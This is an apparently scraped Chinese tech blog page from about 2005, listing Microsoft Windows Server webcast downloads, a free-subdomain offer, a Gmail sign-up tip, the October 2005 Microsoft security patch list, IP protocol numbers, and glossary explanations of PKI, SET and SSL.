Windows Server 2003从入门到精通系列之十四:利用SUS实现自动补丁管理
http://download.microsoft.com/download/5/6/3/563a1537-acbf-42e4-b57e-50bfdbe0b2c0/msft053105vxpm.zip
Windows Server 2003从入门到精通系列之十五:活动目录的设计及部署方法
http://download.microsoft.com/download/2/a/8/2a82c5ce-2c03-4a9c-97d1-b02c31960a16/msft072704vx.zip
Windows XP SP2 新功能与使用技巧
http://download.microsoft.com/download/c/f/4/cf44a97d-7693-446d-ab22-0ec461dfb618/msft082504vx.zip
Windows 2003 群集技术概述
http://download.microsoft.com/download/f/2/9/f293cbe0-5af6-4397-9cc5-61f0f2dda647/msft090704vx.zip
IIS 6.0 安全性最佳实践
http://download.microsoft.com/download/9/c/f/9cf8fbee-c702-46e6-9832-80305c59be5b/msft011805vxpm.zip
探究Windows XP SP2 Firewall——企业环境中的部署
http://download.microsoft.com/download/1/4/1/141fe483-b3f5-4014-a44b-6db7fcfd090e/msft011405vx.zip
探究Windows XP SP2 Firewall——SOHO之部署
http://download.microsoft.com/download/9/2/b/92b86cb2-e024-4ece-8362-69013b8c5ed0/msft092304vx.zip
创建 Windows Server 2003 AD 域
http://download.microsoft.com/download/9/2/b/92b86cb2-e024-4ece-8362-69013b8c5ed0/msft092704vx.zip
组策略在 Windows 2000 和 Windows 2003 中的应用
http://download.microsoft.com/download/2/5/6/256d9a71-5298-4852-a993-717c5cc1233e/msft012805vxam.zip
Windows 管理大全之启动排错全接触
http://download.microsoft.com/download/9/c/f/9cf8fbee-c702-46e6-9832-80305c59be5b/msft011805vxam.zip
Windows 2003 服务应用大全之 IIS6.0 使用详解
http://download.microsoft.com/download/2/5/6/256d9a71-5298-4852-a993-717c5cc1233e/msft012805vxpm.zip
使用GPMC随心所欲管理组策略
http://download.microsoft.com/download/5/9/2/59241a6c-2ddd-4b64-a576-89369342d069/msft012605vxam.zip
深入了解活动目录操作主机角色
http://download.microsoft.com/download/1/4/1/141fe483-b3f5-4014-a44b-6db7fcfd090e/msft011305vx.zip
Windows 2003 SP1 功能预览与演示
http://download.microsoft.com/download/6/3/6/636182f6-12e0-4f16-bf01-ba83a775f5a0/msft012505vx.zip
AD ---- 活动目录的日常管理操作(五)
http://download.microsoft.com/download/9/c/f/9cf8fbee-c702-46e6-9832-80305c59be5b/msft012005vx.zip
AD ---- 活动目录的日常管理操作(四)
http://download.microsoft.com/download/a/a/0/aa02933d-57e5-4a80-8901-153db4740f29/msft011705vx.zip
AD ---- 活动目录的日常管理操作(三)
http://download.microsoft.com/download/3/c/b/3cb83b18-cea7-41de-85b7-354aae6f431b/msft011005vx.zip
AD ---- 活动目录的日常管理操作(二)
http://download.microsoft.com/download/1/3/f/13fafba5-28b9-484c-ac43-96577b51ee6f/msft010405vx.zip
AD ---- 活动目录的日常管理操作(一)
http://download.microsoft.com/download/4/e/c/4ec7db52-91b3-452f-9821-af1ba9b7d1b2/msft122204vx.zip
使用 ADS 部署 Windows 服务器
http://download.microsoft.com/download/4/d/8/4d87ddc1-9899-4934-9560-96b0b107e957/msft122104vxpm.zip
改善系统操作,加强系统安全 - Windows NT 4.0 到2003安全及操作比较
http://download.microsoft.com/download/2/4/6/2463f068-c830-4ecb-81ab-63385200318b/msft121404vx.zip
确保 Windows 服务器的安全性
http://download.microsoft.com/download/3/6/f/36fb1975-93af-4dcf-9704-da509ee53fab/msft120804vx.zip
利用 Windows 平台实现强大的磁盘管理功能
http://download.microsoft.com/download/2/c/6/2c60521f-9f0f-4278-9201-35a23e3e7358/msft120604vx.zip
防御与对策
http://download.microsoft.com/download/e/3/b/e3bd16a0-232d-44da-8e3e-6b23fd3fb2bf/msft120104vxpm.zip
轻松实现集中管理:组策略全面接触
http://download.microsoft.com/download/e/3/b/e3bd16a0-232d-44da-8e3e-6b23fd3fb2bf/msft120204vx.zip
实现高可用的文件访问:基于活动目录的分布式文件系统
http://download.microsoft.com/download/2/c/6/2c60521f-9f0f-4278-9201-35a23e3e7358/msft120304vxpm.zip
轻松从NT4升迁到活动目录
http://download.microsoft.com/download/8/e/c/8ecce034-be30-4bf1-835f-efd98547d248/msft113004vxpm.zip
使用活动目录强化企业网络安全
http://download.microsoft.com/download/8/e/c/8ecce034-be30-4bf1-835f-efd98547d248/msft112904wx.zip
活动目录的商业价值与特性演示
http://download.microsoft.com/download/a/7/f/a7fc7eaf-e835-4c67-a493-9e84214b2451/msft112404vxam.zip
灵活利用组策略做网络管理
http://download.microsoft.com/download/a/7/f/a7fc7eaf-e835-4c67-a493-9e84214b2451/msft112304vx.zip
Virtual PC 2004——构建虚拟测试、开发环境
http://download.microsoft.com/download/7/3/a/73acdd2a-8cca-4618-9658-6c4f363ad770/msft111604vx.zip
用微软解决方案进行有效的安全更新管理
http://download.microsoft.com/download/2/4/6/2469e3d9-336b-42c5-80c1-58098b402674/msft111104vx.zip
活动目录灾难恢复
http://download.microsoft.com/download/2/4/6/2469e3d9-336b-42c5-80c1-58098b402674/msft110904vx.zip
Cluster 技术实现关键技术应用
http://download.microsoft.com/download/9/e/0/9e0f281a-9e0d-44c7-b926-6e592d68852c/msft110404vx.zip
威胁和威胁建模
http://download.microsoft.com/download/1/0/2/10244838-4007-4869-ae9e-ec0ecfd8614e/msft101904vx.zip
Windows 2003 新特性展示
http://download.microsoft.com/download/d/7/6/d764c91c-cc14-48a8-9872-f35d0f849731/msft091004vx.zip
Windows 2003 /span>域的重命名
在线工具书大全
在线工具书大全全方位为科研教学服务,SupFree0改变读者用户传统使用工具书的方式,SupFree0让您在0.5秒的时间内遍历数百本工具书,SupFree0极大的为您的学习科学研究带来便利。SupFree1
目前,SupFree0在线工具书大全共包含记录约1200万条,SupFree0共计10亿汉字,SupFree012亿西文字符,SupFree0包含工具书3300多本,SupFree0内容涉及各学科与专业,SupFree0由科研人员经过5年资料整理,SupFree0采用先进的全文检索技术,SupFree0专业的中文分词,SupFree0高效率索引技术,SupFree0其数据库内容在迅猛的更新和完善,SupFree0为您提供专业科学的在线工具书。SupFree1
http://tool.qcdata.cn/(kjludj55oa3uvo45cmoseu55)/index.aspx
不用邀请函申请Gmail
不用邀请函申请Gmail
申请步骤:
1. 登陆http://www.bytetest.com
2. 接下来你将得到的代码输入到下方"Get Gmail"前面的输入框中,然后点击"Get Gmail"。
3. 到这里已经大功告成了,我们已经来到了创建 Google 帐户的页面。在这里填入你的个人资料即可成功申请Gmail了。
然后就可以登陆了。还送你两个邀请函。
oig.cn免费域名
oig.cn免费域名
| 访问: | oig.cn |
| 此信息来自免费联盟,转载请保留此连接,谢谢. Free-Union.net | |
| 国家: | 中国 |
| 演示网站: | http://mflm.oig.cn by Administrator |
| 域名类型: | 二级域名 |
| 选择数量: | 1 |
| 可选域名: | x.oig.cn |
| 强制广告: | 无 |
| 附子域名: | 无 |
| 子域名数: | 0 |
| 原址隐藏: | 有 |
| 其他: | 注意: EMAIL激活 |
在线查询工具大全
※ | |||
※ | |||
※ | |||
※ | |||
※ | |||
※ | |||
※ | |||
※ | |||
※ | |||
※ | |||
※ | |||
※ | |||
※ | |||
※ | |||
※ | |||
※ | |||
※ | |||
※ |
微软发布10月安全公告
微软于
专家提醒广大用户,请及时下载安装这些最新安全补丁,以免受到漏洞造成的恶意攻击。
立即下载2005年10月更新补丁:
三个严重威胁:
×DirectShow 中的漏洞可能允许远程执行代码 (904706)
·DirectX 9 for WinXP 安全更新程序 (KB904706)
·Windows XP 安全更新程序 (KB904706)
·Windows 2000 安全更新程序 (KB904706)
×MSDTC 和 COM+ 中的漏洞可能允许远程执行代码 (902400)
·Windows XP 安全更新程序 (KB902400)
·Windows 2000 安全更新程序 (KB902400)
·Windows Server 2003 安全更新程序 (KB902400)
×Internet Explorer 的累积性安全更新 (896688)
·IE for WinXP SP2 安全更新程序 (KB896688)
·IE6 SP1 安全更新程序 (KB896688)
·IE for Server 2003 安全更新程序 (KB896688)
·IE 5.01 SP4 安全更新程序 (KB896688)
×NetWare 客户端服务中的漏洞可能允许远程执行代码 (899589)
·Microsoft XP 安全更新程序 (KB899589)
·Windows 2000 安全更新程序 (KB899589)
·Windows Server 2003 安全更新程序 (KB899589)
×即插即用中的漏洞可能允许远程执行代码和特权提升 (905749)
·Windows XP 安全更新程序 (KB905749)
·Windows 2000 安全更新程序 (KB905749)
×Microsoft 协作对象中的漏洞可能允许远程执行代码 (907245)
·Windows XP 安全更新程序 (KB901017)
·Windows 2000 安全更新程序 (KB901017)
·Windows Server 2003 安全更新程序 (KB901017)
×Windows Shell 中的漏洞可能允远程执行代码 (900725)
·Windows XP 安全更新程序 (KB900725)
·Windows 2000 安全更新程序 (KB900725)
·Windows Server 2003 安全更新程序 (KB900725)
×Windows FTP 客户端中的漏洞可能允许篡改文件传输位置 (905495)
·Microsoft XP 安全更新程序 (KB905495)
·Windows 2000 SP4 IE6 SP1 安全更新程序 (KB905495)
·Windows Server 2003 安全更新程序 (KB905495)
×网络连接管理器中的漏洞可能允许拒绝服务 (905414)
·Windows XP 安全更新程序 (KB905414)
·Windows 2000 安全更新程序 (KB905414)
·Windows Server 2003 安全更新程序 (KB905414)
查看微软官方详细说明:
常见的协议号
1、Internet Control Message Protocol (ICMP)
2、Internet Group Management Protocol (IGMP)
3、Gateway to Gateway Protocol (GGP)
4、IP in IP
6、Transmission Control Protocol (TCP)
8、Exterior Gateway Protocol (EGP)
17、User Datagram Protocol (UDP)
35、Inter-Domain Policy Routing Protocol (IDPR)
45、Inter-Domain Routing Protocol (IDRP)
46、Resource Reservation Protocol (RSVP)
47、Generic Routing Encapsulation (GRE)
54、NBMA Next Hop Resolution Protocol (NHRP)
88、Cisco Internet Gateway Routing Protocol (IGRP)
89、Open Shortest Path First (OSPF)
网络安全技术中名词解释
一.PKI技术
为解决Internet的安全问题,世界各国对其进行了多年的研究,初步形成了一套完整的Internet安全解决方案,即目前被广泛采用的PKI体系结构,PKI体系结构采用证书管理公钥,通过第三方的可信机构CA,把用户的公钥和用户的其他标识信息(如名称、e-mail、身份证号等)捆绑在一起,在Internet网上验证用户的身份,PKI体系结构把公钥密码和对称密码结合起来,在Internet网上实现密钥的自动管理,保证网上数据的机密性、完整性。
从广义上讲,所有提供公钥加密和数字签名服务的系统,都可叫做PKI系统,PKI的主要目的是通过自动管理密钥和证书,可以为用户建立起一个安全的网络运行环境,使用户可以在多种应用环境下方便的使用加密和数字签名技术,从而保证网上数据的机密性、完整性、有效性,数据的机密性是指数据在传输过程中,不能被非授权者偷看,数据的完整性是指数据在传输过程中不能被非法篡改,数据的有效性是指数据不能被否认。一个有效的PKI系统必须是安全的和透明的,用户在获得加密和数字签名服务时,不需要详细地了解PKI是怎样管理证书和密钥的,一个典型、完整、有效的PKI应用系统至少应具有以下部分:
公钥密码证书管理。
黑名单的发布和管理。
密钥的备份和恢复。
自动更新密钥。
自动管理历史密钥。
支持交叉认证。
由于PKI体系结构是目前比较成熟、完善的Internet网络安全解决方案,国外的一些大的网络安全公司纷纷推出一系列的基于PKI的网络安全产品,如美国的Verisign, IBM ,Entrust等安全产品供应商为用户提供了一系列的客户端和服务器端的安全产品,为电子商务的发展提供了安全保证。为电子商务、政府办公网、EDI等提供了完整的网络安全解决方案。
PKI是一种新的安全技术,它由公开密钥密码技术、数字证书、证书发放机构(CA)和关于公开密钥的安全策略等基本成分共同组成的。PKI是利用公钥技术实现电子商务安全的一种体系,是一种基础设施,网络通讯、网上交易是利用它来保证安全的。从某种意义上讲,PKI包含了安全认证系统,即安全认证系统-CA/RA系统是PKI不可缺的组成部分。
PKI(Public Key Infrastructure)公钥基础设施是提供公钥加密和数字签名服务的系统或平台,目的是为了管理密钥和证书。一个机构通过采用PKI框架管理密钥和证书可以建立一个安全的网络环境。 X.509格式的证书和证书废除列表(CRL); CA/RA操作协议; CA管理协议; CA政策制定。
二.SET协议
电子商务在提供机遇和便利的同时,也面临着一个最大的挑战,即交易的安全问题。在网上购物的环境中,持卡人希望在交易中保密自己的帐户信息,使之不被人盗用;商家则希望客户的定单不可抵赖,并且,在交易过程中,交易各方都希望验明其他方的身份,以防止被欺骗。针对这种情况,由美国Visa和MasterCard两大信用卡组织联合国际上多家科技机构,共同制定了应用于Internet上的以银行卡为基础进行在线交易的安全标准,这就是"安全电子交易"(Secure Electronic Transaction,简称SET)。它采用公钥密码体制和X.509数字证书标准,主要应用于保障网上购物信息的安全性。
由于SET 提供了消费者、商家和银行之间的认证,确保了交易数据的安全性、完整可靠性和交易的不可否认性,特别是保证不将消费者银行卡号暴露给商家等优点,因此它成为了目前公认的信用卡/借记卡的网上交易的国际安全标准。
SET(Secure Electronic Transaction)安全电子交易协议是由美国Visa和MasterCard两大信用卡组织提出的应用于Internet上的以信用卡为基础的电子支付系统协议。它采用公钥密码体制和X.509数字证书标准,主要应用于B to C模式中保障支付信息的安全性。SET协议本身比较复杂,设计比较严格,安全性高,它能保证信息传输的机密性、真实性、完整性和不可否认性。SET协议是PKI框架下的一个典型实现,同时也在不断升级和完善,如SET 2.0将支持借记卡电子交易。
三.SSL协议
SSL (Secure socket Layer)安全套接层协议主要是使用公开密钥体制和X.509数字证书技术保护信息传输的机密性和完整性,它不能保证信息的不可抵赖性,主要适用于点对点之间的信息传输,常用Web Server方式。
安全套接层协议(SSL,Security Socket Layer)是网景(Netscape)公司提出的基于WEB应用的安全协议,它包括:服务器认证、客户认证(可选)、SSL链路上的数据完整性和SSL链路上的数据保密性。对于电子商务应用来说,使用SSL可保证信息的真实性、完整性和保密性。但由于SSL不对应用层的消息进行数字签名,因此不能提供交易的不可否认性,这是SSL在电子商务中使用的最大不足。有鉴于此,网景公司在从Communicator 4.04版开始的所有浏览器中引入了一种被称作"表单签名(Form Signing)"的功能,在电子商务中,可利用这一功能来对包含购买者的订购信息和付款指令的表单进行数字签名,从而保证交易信息的不可否认性。综上所述,在电子商务中采用单一的SSL协议来保证交易的安全是不够的,但采用"SSL+表单签名"模式能够为电子商务提供较好的安全性保证。